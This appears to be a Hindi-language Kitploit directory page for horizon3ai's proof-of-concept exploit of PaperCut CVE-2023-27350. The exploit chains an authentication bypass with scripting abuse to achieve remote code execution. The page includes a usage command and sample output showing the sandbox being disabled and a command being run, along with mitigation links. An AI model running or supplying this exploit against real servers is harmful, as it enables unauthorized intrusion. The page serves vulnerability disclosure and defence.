Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-27350 — PaperCut CVE-2023-27350 के लिए Proof-of-concept exploit, जो authentication bypass को built-in scripting abuse के साथ chain करके कमजोर MF/NG instances पर remote code execution प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/horizon3ai/cve-2023-27350
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षा
GitHubhorizon3ai/cve-2023-27350

CVE-2023-27350

PaperCut CVE-2023-27350 के लिए Proof-of-concept exploit, जो authentication bypass को built-in scripting abuse के साथ chain करके कमजोर MF/NG instances पर remote code execution प्राप्त करता है।

रिपॉजिटरी देखें
552423 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-27350

PaperCut MF/NG पर प्रभाव डालने वाले CVE-2023-27350 के लिए POC

तकनीकी विश्लेषण

भेद्यता का तकनीकी मूल कारण विश्लेषण, समझौता संकेतक और इंटरनेट एक्सपोजर हमारे ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise

सारांश

यह POC एक प्रमाणीकरण बाईपास भेद्यता का उपयोग करता है जिसे कोड निष्पादित करने के लिए अंतर्निहित स्क्रिप्टिंग कार्यक्षमता के दुरुपयोग के साथ जोड़ा गया है।

उपयोग

root@kitploit:~
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

शमन उपाय

नवीनतम संस्करण में अपडेट करें या PaperCut सुरक्षा सलाहकार में दिए गए निर्देशों का पालन करके शमन करें

  • https://www.papercut.com/kb/Main/PO-1216-and-PO-1219

नवीनतम सुरक्षा अनुसंधान के लिए Twitter पर Horizon3.ai Attack Team को फ़ॉलो करें:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

अस्वीकरण

यह सॉफ़्टवेयर पूरी तरह से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उपयोग स्पष्ट रूप से अधिकृत प्रणालियों को छोड़कर अन्य पर आक्रमण करने के लिए नहीं किया जाना चाहिए। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें